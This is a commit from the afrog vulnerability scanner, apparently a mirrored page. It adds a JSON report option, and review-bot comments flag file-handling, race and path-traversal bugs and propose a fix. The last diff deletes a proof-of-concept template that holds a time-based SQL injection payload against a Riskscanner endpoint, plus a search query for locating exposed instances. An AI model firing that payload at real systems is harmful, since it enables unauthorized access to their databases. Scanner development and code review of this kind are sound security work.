Projects STRLCPY afrog Commits 74992922
  • ■ ■ ■ ■ ■ ■
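--- a/.gitignore
+++ b/.gitignore
@@ -37,6 +37,9 @@
 cmd/afrog/main.rc
 cmd/afrog/main.syso
 
+cmd/pool*
+cmd/server*
+cmd/update*
 cmd/ants*
 cmd/api*
 cmd/celgo*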
  • ■ ■ ■ ■ ■
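--- a/cmd/afrog/main.go
+++ b/cmd/afrog/main.go
@@ -69,6 +69,10 @@
  htemplate.Result = r
  htemplate.Number = utils.GetNumberText(int(number))
  htemplate.Append()
+
+ if len(options.OutputJson) > 0 {
+ options.OJ.AddJson(r.PocInfo.Id, r.PocInfo.Info.Severity, r.FullTarget)
+ }
  }
  lock.Unlock()
  }
@@ -102,6 +106,7 @@
  flagSet.CreateGroup("output", "Output",
  flagSet.StringVarP(&options.Output, "output", "o", "", "output html report, eg: -o result.html"),
  flagSet.BoolVarP(&options.PrintPocs, "printpocs", "pp", false, "print afrog-pocs list"),
+ flagSet.StringVar(&options.OutputJson, "json", "", "write output in JSON format"),
  )
 
  flagSet.CreateGroup("filters", "Filtering",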
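Review bot: The new guard in the result callback tests `len(options.OutputJson) > 0` but then dereferences `options.OJ`, which this commit assigns only in internal/runner/runner.go; testing the pointer itself, `if options.OJ != nil {`, removes the dependency on that other code path having run first. The call also sits before `lock.Unlock()`, so, judging from the visible lines, each finding rewrites the whole report while the result lock is held. The `-json` help text could say where the file ends up, e.g. `"write JSON report to reports/<file>, eg: -json result.json"`. The callback starts and ends outside the hunk.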
  • ■ ■ ■ ■ ■
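--- a/internal/runner/runner.go
+++ b/internal/runner/runner.go
@@ -2,6 +2,7 @@
 
 import (
  "fmt"
+ "net/http"
  "os"
  "sync"
  "time"
@@ -14,6 +15,7 @@
  "github.com/zan8in/afrog/pkg/fingerprint"
  "github.com/zan8in/afrog/pkg/html"
  "github.com/zan8in/afrog/pkg/log"
+ "github.com/zan8in/afrog/pkg/output"
  "github.com/zan8in/afrog/pkg/poc"
  "github.com/zan8in/afrog/pkg/protocols/http/retryhttpclient"
  "github.com/zan8in/afrog/pkg/targetlive"
@@ -56,6 +58,11 @@
  htemplate.Filename = options.Output
  if err := htemplate.New(); err != nil {
  gologger.Fatal().Msgf("Output failed, %s", err.Error())
+ }
+
+ // output to json file
+ if len(options.OutputJson) > 0 {
+ options.OJ = output.NewOutputJson(options.OutputJson)
  }
 
  // show banner
@@ -188,7 +195,7 @@
  // url, statusCode := http2.CheckTargetHttps(url)
  url, statusCode = retryhttpclient.CheckHttpsAndLives(url)
 
- if statusCode == -1 || statusCode >= 500 {
+ if statusCode == -1 || statusCode >= http.StatusInternalServerError {
  if statusCode == -1 && !utils.IsURL(url) {
  url = "http://" + url
  }
@@ -205,7 +212,7 @@
  // url, statusCode := http2.CheckTargetHttps(url)
  url, statusCode = retryhttpclient.CheckHttpsAndLives(url)
 
- if statusCode == -1 || statusCode >= 500 {
+ if statusCode == -1 || statusCode >= http.StatusInternalServerError {
  if statusCode == -1 && !utils.IsURL(url) {
  url = "http://" + url
  }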
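Review bot: `options.OutputJson` is handed to `output.NewOutputJson` without any check, and that constructor builds the path as `"reports/" + filename`, so a value containing `../` puts the report outside the report directory. If the option can ever be set by something other than the operator's own command line (not visible in this hunk), reduce it to a file name first: `options.OJ = output.NewOutputJson(filepath.Base(options.OutputJson))`, with `path/filepath` added to the imports. The two `statusCode >= http.StatusInternalServerError` blocks later in the file are identical in the visible lines and could share one helper. The enclosing function starts and ends outside the hunk.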
  • ■ ■ ■ ■ ■ ■
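--- a/pkg/config/options.go
+++ b/pkg/config/options.go
@@ -4,6 +4,7 @@
  "strings"
  "sync"
 
+ "github.com/zan8in/afrog/pkg/output"
  "github.com/zan8in/afrog/pkg/utils"
  "github.com/zan8in/afrog/pocs"
  "github.com/zan8in/gologger"
@@ -103,6 +104,11 @@
 
  // afrog process count (target total × pocs total)
  ProcessTotal uint32
+
+ // write output in JSONL(ines) format
+ OutputJson string
+
+ OJ *output.OutputJson
 }
 
 type ApiCallBack func(any)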
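Review bot: The comment on `OutputJson` says `JSONL(ines)`, but pkg/output/json.go in this same commit writes a single JSON array, and the exported `OJ` field has no comment at all. Suggested wording: `// OutputJson is the file name of the JSON report, written under reports/` and `// OJ collects findings for the JSON report; nil unless OutputJson is set`. The struct begins outside the hunk.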
  • ■ ■ ■ ■ ■ ■
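--- a/pkg/output/json.go
+++ b/pkg/output/json.go
@@ -0,0 +1,64 @@
+package output
+
+import (
+ "bufio"
+ "encoding/json"
+ "os"
+ "strings"
+ "sync"
+
+ "github.com/zan8in/gologger"
+)
+
+type OutputJson struct {
+ Filename string
+ JsonSlices []JsonInfo
+ mutex sync.Mutex
+}
+
+type JsonInfo struct {
+ Name string `json:"name"`
+ Severity string `json:"severity"`
+ Url string `json:"url"`
+}
+
+func NewOutputJson(filename string) *OutputJson {
+ return &OutputJson{
+ Filename: "reports/" + filename,
+ JsonSlices: make([]JsonInfo, 0),
+ mutex: sync.Mutex{},
+ }
+}
+
+func (o *OutputJson) AddJson(name, severity, url string) {
+ o.JsonSlices = append(o.JsonSlices, JsonInfo{Name: name, Severity: severity, Url: url})
+
+ if len(o.JsonSlices) > 0 {
+
+ o.mutex.Lock()
+ defer o.mutex.Unlock()
+
+ content := "["
+
+ for _, j := range o.JsonSlices {
+ v, _ := json.Marshal(&j)
+ content += string(v) + ","
+ }
+
+ content = strings.TrimSuffix(content, ",")
+
+ content += "]"
+
+ f, err := os.OpenFile(o.Filename, os.O_WRONLY|os.O_CREATE, 0666)
+ if err != nil {
+ gologger.Fatal().Msgf("OutputJson to file %s failed, %s", o.Filename, err.Error())
+ }
+
+ wbuf := bufio.NewWriterSize(f, len(content))
+ wbuf.WriteString(content)
+ wbuf.Flush()
+
+ }
+
+}
+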
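Review bot: `AddJson` opens the report with `os.O_WRONLY|os.O_CREATE` and no `os.O_TRUNC`, never closes `f`, and discards the `json.Marshal`, `WriteString` and `Flush` errors, so a longer file left under the same name keeps stale bytes after the closing `]` and every finding leaks one file descriptor. The `append` to `o.JsonSlices` also runs before `o.mutex.Lock()`, so the mutex does not protect the slice it appears meant to guard. Mode `0666` leaves a file that lists vulnerable targets readable and writable by other local users wherever the umask allows it; `0600` suits a findings report better. The rewrite below keeps the JSON-array output and makes the `bufio` and `strings` imports unnecessary.

```go
// … unchanged: OutputJson, JsonInfo, NewOutputJson …

func (o *OutputJson) AddJson(name, severity, url string) {
	// Take the lock before touching the slice so concurrent callers cannot race on append.
	o.mutex.Lock()
	defer o.mutex.Unlock()

	o.JsonSlices = append(o.JsonSlices, JsonInfo{Name: name, Severity: severity, Url: url})

	content, err := json.Marshal(o.JsonSlices)
	if err != nil {
		gologger.Fatal().Msgf("OutputJson to file %s failed, %s", o.Filename, err.Error())
	}

	// os.WriteFile truncates, writes and closes; 0600 keeps findings private to the operator.
	if err := os.WriteFile(o.Filename, content, 0600); err != nil {
		gologger.Fatal().Msgf("OutputJson to file %s failed, %s", o.Filename, err.Error())
	}
}
```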
  • ■ ■ ■ ■ ■ ■
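--- a/pocs/temp/afrog-pocs/vulnerability/Riskscanner-list-SQL.yaml
+++ b/pocs/temp/afrog-pocs/vulnerability/Riskscanner-list-SQL.yaml
@@ -1,23 +0,0 @@
-id: Riskscanner-list-SQL
-
-info:
- name: Riskscanner list SQL注入漏洞
- author: daffainfo
- severity: critical
- description: Riskscanner list接口存在SQL注入漏洞,通过漏洞可获取服务器权限
- reference:
- - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Riskscanner%20list%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- metadata:
- fofa-query: title="Riskscanner"
-
-set:
- sleepSecond: randomInt(4, 6)
-rules:
- r0:
- request:
- method: POST
- path: /resource/list/1/10
- body: |
- {"sort":"1)a union select sleep({{sleepSecond}}) -- -"}
- expression: sleepSecond * 1000 <= response.latency <= sleepSecond * 1000 + 500
-expression: r0()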